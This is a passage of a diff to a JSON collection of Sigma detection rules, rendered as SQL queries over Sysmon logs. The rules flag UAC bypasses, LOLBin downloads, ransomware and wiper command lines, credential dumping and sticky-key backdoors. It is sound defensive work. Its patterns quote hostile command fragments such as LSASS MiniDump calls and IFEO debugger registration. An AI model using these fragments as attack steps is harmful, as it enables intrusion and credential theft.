WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\RazerInstaller.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND NOT (Image LIKE 'C:\\\\Windows\\\\Installer\\\\Razer\\\\Installer\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_createdump.yml" + "filename": "proc_creation_win_exploit_other_razorinstaller_lpe.yml" }, { - "title": "Using SettingSyncHost.exe as LOLBin", - "id": "b2ddd389-f676-4ac4-845a-e00781a48e5f", + "title": "Potential Commandline Obfuscation Using Unicode Characters", + "id": "e0552b19-5a83-4222-b141-b36184bb8d79", "status": "test", - "description": "Detects using SettingSyncHost.exe to run hijacked binary", - "author": "Anton Kutepov, oscd.community", + "description": "Detects potential commandline obfuscation using unicode characters.\nAdversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.\n", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1574.008" + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) AND (ParentCommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' AND ParentCommandLine LIKE '%RoamDiag.cmd%' ESCAPE '\\' AND ParentCommandLine LIKE '%-outputpath%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%ˣ%' ESCAPE '\\' OR CommandLine LIKE '%˪%' ESCAPE '\\' OR CommandLine LIKE '%ˢ%' ESCAPE '\\') OR (CommandLine LIKE '%∕%' ESCAPE '\\' OR CommandLine LIKE '%⁄%' ESCAPE '\\') OR (CommandLine LIKE '%―%' ESCAPE '\\' OR CommandLine LIKE '%—%' ESCAPE '\\') OR (CommandLine LIKE '%â%' ESCAPE '\\' OR CommandLine LIKE '%€%' ESCAPE '\\' OR CommandLine LIKE '%£%' ESCAPE '\\' OR CommandLine LIKE '%¯%' ESCAPE '\\' OR CommandLine LIKE '%®%' ESCAPE '\\' OR CommandLine LIKE '%µ%' ESCAPE '\\' OR CommandLine LIKE '%¶%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_settingsynchost.yml" + "filename": "proc_creation_win_susp_cli_obfuscation_unicode.yml" }, { - "title": "Reg Add Suspicious Paths", - "id": "b7e2a8d4-74bb-4b78-adc9-3f92af2d4829", - "status": "experimental", - "description": "Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys", - "author": "frack113, Nasreddine Bencherchali", + "title": "Suspicious WebDav Client Execution", + "id": "982e9f2d-1a85-4d5b-aea4-31f5e97c6555", + "status": "experimental", + "description": "Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397\n", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112", - "attack.t1562.001" + "attack.exfiltration", + "attack.t1048.003", + "cve.2023.23397" ], "falsepositives": [ - "Rare legitimate add to registry via cli (to these locations)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\OOBE%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\Currentversion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\SecurityProviders\\\\WDigest%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-s WebClient%' ESCAPE '\\' AND Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine REGEXP '://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}') AND NOT (((CommandLine LIKE '%://10.%' ESCAPE '\\' OR CommandLine LIKE '%://192.168.%' ESCAPE '\\' OR CommandLine LIKE '%://172.16.%' ESCAPE '\\' OR CommandLine LIKE '%://172.17.%' ESCAPE '\\' OR CommandLine LIKE '%://172.18.%' ESCAPE '\\' OR CommandLine LIKE '%://172.19.%' ESCAPE '\\' OR CommandLine LIKE '%://172.20.%' ESCAPE '\\' OR CommandLine LIKE '%://172.21.%' ESCAPE '\\' OR CommandLine LIKE '%://172.22.%' ESCAPE '\\' OR CommandLine LIKE '%://172.23.%' ESCAPE '\\' OR CommandLine LIKE '%://172.24.%' ESCAPE '\\' OR CommandLine LIKE '%://172.25.%' ESCAPE '\\' OR CommandLine LIKE '%://172.26.%' ESCAPE '\\' OR CommandLine LIKE '%://172.27.%' ESCAPE '\\' OR CommandLine LIKE '%://172.28.%' ESCAPE '\\' OR CommandLine LIKE '%://172.29.%' ESCAPE '\\' OR CommandLine LIKE '%://172.30.%' ESCAPE '\\' OR CommandLine LIKE '%://172.31.%' ESCAPE '\\' OR CommandLine LIKE '%://127.%' ESCAPE '\\' OR CommandLine LIKE '%://169.254.%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_reg_susp_paths.yml" + "filename": "proc_creation_win_rundll32_webdav_client_susp_execution.yml" }, { - "title": "Email Exifiltration Via Powershell", - "id": "312d0384-401c-4b8b-abdf-685ffba9a332", + "title": "SQLite Firefox Profile Data DB Access", + "id": "4833155a-4053-4c9c-a997-777fcea0baa7", "status": "experimental", - "description": "Detects email exfiltration via powershell cmdlets", - "author": "Nasreddine Bencherchali (Nextron Systems), Azure-Sentinel (idea)", + "description": "Detect usage of the \"sqlite\" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.", + "author": "frack113", "tags": [ - "attack.exfiltration" + "attack.credential_access", + "attack.t1539", + "attack.collection", + "attack.t1005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND CommandLine LIKE '%Get-Recipient%' ESCAPE '\\' AND CommandLine LIKE '%-ExpandProperty%' ESCAPE '\\' AND CommandLine LIKE '%EmailAddresses%' ESCAPE '\\' AND CommandLine LIKE '%SmtpAddress%' ESCAPE '\\' AND CommandLine LIKE '%-hidetableheaders%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product = 'SQLite' OR (Image LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR Image LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%cookies.sqlite%' ESCAPE '\\' OR CommandLine LIKE '%places.sqlite%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_email_exfil.yml" + "filename": "proc_creation_win_sqlite_firefox_gecko_profile_data.yml" }, { - "title": "Imports Registry Key From an ADS", - "id": "0b80ade5-6997-4b1d-99a1-71701778ea61", - "status": "test", - "description": "Detects the import of a alternate datastream to the registry with regedit.exe.", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "title": "Suspicious File Download via CertOC.exe", + "id": "70ad0861-d1fe-491c-a45f-fa48148a300d", + "status": "experimental", + "description": "Detects when a user downloads file by using CertOC.exe", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1112", - "attack.defense_evasion" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND ((CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\') AND CommandLine REGEXP ':[^ \\\\]')) AND NOT ((CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /a %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND CommandLine LIKE '%-GetCACAPS%' ESCAPE '\\')" ], - "filename": "proc_creation_win_regedit_import_keys_ads.yml" + "filename": "proc_creation_win_lolbin_certoc_download.yml" }, { - "title": "Bypass UAC via CMSTP", - "id": "e66779cc-383e-4224-a3a4-267eeb585c40", + "title": "Potential BlackByte Ransomware Activity", + "id": "999e8307-a775-4d5f-addc-4855632335be", "status": "test", - "description": "Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", - "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002", - "attack.t1218.003" - ], + "description": "Detects command line patterns used by BlackByte ransomware in different operations", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate use of cmstp.exe utility by legitimate user" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR OriginalFileName = 'CMSTP.EXE') AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\' OR CommandLine LIKE '%/au%' ESCAPE '\\' OR CommandLine LIKE '%-au%' ESCAPE '\\' OR CommandLine LIKE '%/ni%' ESCAPE '\\' OR CommandLine LIKE '%-ni%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND CommandLine LIKE '% -single %' ESCAPE '\\') OR (CommandLine LIKE '%del C:\\\\Windows\\\\System32\\\\Taskmgr.exe%' ESCAPE '\\' OR CommandLine LIKE '%;Set-Service -StartupType Disabled $%' ESCAPE '\\' OR CommandLine LIKE '%powershell -command \"$x =[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(%' ESCAPE '\\' OR CommandLine LIKE '% do start wordpad.exe /p %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_cmstp.yml" + "filename": "proc_creation_win_malware_blackbyte_ransomware.yml" }, { - "title": "Renamed NetSupport RAT Execution", - "id": "0afbd410-de03-4078-8491-f132303cb67d", - "status": "experimental", - "description": "Detects the execution of a renamed \"client32.exe\" (NetSupport RAT) via Imphash, Product and OriginalFileName strings", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential SystemNightmare Exploitation Attempt", + "id": "c01f7bd6-0c1d-47aa-9c61-187b91273a16", + "status": "test", + "description": "Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.privilege_escalation", + "attack.t1068" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product LIKE '%NetSupport Remote Control%' ESCAPE '\\' OR OriginalFileName LIKE '%client32.exe%' ESCAPE '\\' OR Imphash = 'a9d50692e95b79723f3e76fcf70d023e' OR Hashes LIKE '%IMPHASH=A9D50692E95B79723F3E76FCF70D023E%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\client32.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%printnightmare.gentilkiwi.com%' ESCAPE '\\' OR CommandLine LIKE '% /user:gentilguest %' ESCAPE '\\' OR CommandLine LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_netsupport_rat.yml" + "filename": "proc_creation_win_exploit_other_systemnightmare.yml" }, { - "title": "Sensitive Registry Access via Volume Shadow Copy", - "id": "f57f8d16-1f39-4dcb-a604-6c73d9b54b3d", - "status": "experimental", - "description": "Detects a command that accesses password storing registry hives via volume shadow backups", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "title": "UAC Bypass Using MSConfig Token Modification - Process", + "id": "ad92e3f9-7eb6-460e-96b1-582b0ccbb980", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Some rare backup scenarios" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\NTDS.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SECURITY%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\tmp\\\\log%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel IN ('High', 'System') AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\msconfig.exe\" -5' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_conti_shadowcopy.yml" + "filename": "proc_creation_win_uac_bypass_msconfig_gui.yml" }, { - "title": "Exchange PowerShell Snap-Ins Usage", - "id": "25676e10-2121-446e-80a4-71ff8506af47", - "status": "experimental", - "description": "Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27", - "author": "FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Persistence Via Netsh Helper DLL", + "id": "56321594-9087-49d9-bf10-524fe8479452", + "status": "test", + "description": "Detects the execution of netsh with \"add helper\" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.", + "author": "Victor Sergeev, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.collection", - "attack.t1114" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.007", + "attack.s0108" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND (CommandLine LIKE '%Microsoft.Exchange.Powershell.Snapin%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft.Exchange.Management.PowerShell.SnapIn%' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND CommandLine LIKE '%$exserver=Get-ExchangeServer ([Environment]::MachineName) -ErrorVariable exerr 2> $null%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\netsh.exe' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%helper%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_snapins_hafnium.yml" + "filename": "proc_creation_win_netsh_helper_dll_persistence.yml" }, { - "title": "Winword LOLBIN Usage", - "id": "4ae3e30b-b03f-43aa-87e3-b622f4048eed", - "status": "experimental", - "description": "Detects Winword process loading custmom dlls via the '/l' switch.\nWinword can be abused as a LOLBIN to download arbitrary file or load arbitrary DLLs.\n", - "author": "Nasreddine Bencherchali (Nextron Systems), Victor Sergeev, oscd.community", + "title": "UAC Bypass Tools Using ComputerDefaults", + "id": "3c05e90d-7eba-4324-9972-5d7f711a60a8", + "status": "test", + "description": "Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\WINWORD.exe' ESCAPE '\\' OR OriginalFileName = 'WinWord.exe') AND (CommandLine LIKE '%/l %' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (IntegrityLevel IN ('High', 'System') AND Image LIKE 'C:\\\\Windows\\\\System32\\\\ComputerDefaults.exe' ESCAPE '\\') AND NOT ((ParentImage LIKE '%:\\\\Windows\\\\System32%' ESCAPE '\\' OR ParentImage LIKE '%:\\\\Program Files%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_winword.yml" + "filename": "proc_creation_win_uac_bypass_computerdefaults.yml" }, { - "title": "Suspicious Greedy Compression Using Rar.EXE", - "id": "afe52666-401e-4a02-b4ff-5d128990b8cb", + "title": "Hermetic Wiper TG Process Patterns", + "id": "2f974656-6d83-4059-bbdf-68ac5403422f", "status": "experimental", - "description": "Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes", - "author": "X__Junior, Florian Roth", + "description": "Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059" + "attack.lateral_movement", + "attack.t1021.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rar.exe' ESCAPE '\\' OR Description = 'Command line RAR' OR (CommandLine LIKE '%.exe a %' ESCAPE '\\' OR CommandLine LIKE '% a -m%' ESCAPE '\\')) AND (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% -r %' ESCAPE '\\' AND (CommandLine LIKE '% C:\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '% \\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\$Recycle.bin\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\policydefinitions\\\\postgresql.exe' ESCAPE '\\' OR (CommandLine LIKE '%CSIDL\\_SYSTEM\\_DRIVE\\\\temp\\\\sys.tmp%' ESCAPE '\\' OR CommandLine LIKE '% 1> \\\\\\\\127.0.0.1\\\\ADMIN$\\\\\\_\\_16%' ESCAPE '\\') OR (CommandLine LIKE '%powershell -c %' ESCAPE '\\' AND CommandLine LIKE '%\\\\comsvcs.dll MiniDump %' ESCAPE '\\' AND CommandLine LIKE '%\\\\winupd.log full%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rar_susp_greedy_compression.yml" + "filename": "proc_creation_win_malware_hermetic_wiper_activity.yml" }, { - "title": "Suspicious Compression Tool Parameters", - "id": "27a72a60-7e5e-47b1-9d17-909c9abafdcd", - "status": "test", - "description": "Detects suspicious command line arguments of common data compression tools", - "author": "Florian Roth (Nextron Systems), Samir Bousseaden", + "title": "Suspicious DumpMinitool Execution", + "id": "eb1c4225-1c23-4241-8dd4-051389fde4ce", + "status": "experimental", + "description": "Detects suspicious ways to use the \"DumpMinitool.exe\" binary", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((OriginalFileName LIKE '7z%.exe' ESCAPE '\\' OR OriginalFileName LIKE '%rar.exe' ESCAPE '\\' OR OriginalFileName LIKE '%Command%Line%RAR%' ESCAPE '\\') AND (CommandLine LIKE '% -p%' ESCAPE '\\' OR CommandLine LIKE '% -ta%' ESCAPE '\\' OR CommandLine LIKE '% -tb%' ESCAPE '\\' OR CommandLine LIKE '% -sdel%' ESCAPE '\\' OR CommandLine LIKE '% -dw%' ESCAPE '\\' OR CommandLine LIKE '% -hp%' ESCAPE '\\')) AND NOT (ParentImage LIKE 'C:\\\\Program%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\DumpMinitool.exe' ESCAPE '\\' OR Image LIKE '%\\\\DumpMinitool.x86.exe' ESCAPE '\\' OR Image LIKE '%\\\\DumpMinitool.arm64.exe' ESCAPE '\\') OR OriginalFileName IN ('DumpMinitool.exe', 'DumpMinitool.x86.exe', 'DumpMinitool.arm64.exe')) AND ((NOT ((Image LIKE '%\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Extensions\\\\%' ESCAPE '\\')) OR CommandLine LIKE '%.txt%' ESCAPE '\\') OR ((CommandLine LIKE '% Full%' ESCAPE '\\' OR CommandLine LIKE '% Mini%' ESCAPE '\\' OR CommandLine LIKE '% WithHeap%' ESCAPE '\\') AND NOT (CommandLine LIKE '%--dumpType%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_compression_params.yml" + "filename": "proc_creation_win_dumpminitool_susp_execution.yml" }, { - "title": "Rundll32 Registered COM Objects", - "id": "f1edd233-30b5-4823-9e6a-c4171b24d316", + "title": "Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE", + "id": "a35f5a72-f347-4e36-8895-9869b0d5fc6d", "status": "test", - "description": "load malicious registered COM objects", - "author": "frack113", + "description": "Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall", + "author": "Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.015" + "attack.defense_evasion", + "attack.t1562.004" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ((CommandLine LIKE '%-sta %' ESCAPE '\\' OR CommandLine LIKE '%-localserver %' ESCAPE '\\') AND CommandLine LIKE '%{%' ESCAPE '\\' AND CommandLine LIKE '%}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%allowedprogram%' ESCAPE '\\') OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%action=allow%' ESCAPE '\\' AND CommandLine LIKE '%program=%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%Public\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\RECYCLER\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\SystemVolumeInformation\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\cursors\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\drivers\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\fonts\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\help\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\system32\\\\tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_registered_com_objects.yml" + "filename": "proc_creation_win_netsh_fw_allow_program_in_susp_location.yml" }, { - "title": "DevInit Lolbin Download", - "id": "90d50722-0483-4065-8e35-57efaadd354d", + "title": "Suspicious Debugger Registration Cmdline", + "id": "ae215552-081e-44c7-805f-be16f975c8a2", "status": "test", - "description": "Detects a certain command line flag combination used by devinit.exe lolbin to download arbitrary MSI packages on a Windows system", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.008" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% -t msi-install %' ESCAPE '\\' AND CommandLine LIKE '% -i http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\CurrentVersion\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%displayswitch.exe%' ESCAPE '\\' OR CommandLine LIKE '%atbroker.exe%' ESCAPE '\\' OR CommandLine LIKE '%HelpPane.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_devinit.yml" + "filename": "proc_creation_win_registry_install_reg_debugger_backdoor.yml" }, { - "title": "Process Dump via RdrLeakDiag.exe", - "id": "edadb1e5-5919-4e4c-8462-a9e643b02c4b", - "status": "test", - "description": "Detects a process memory dump performed by 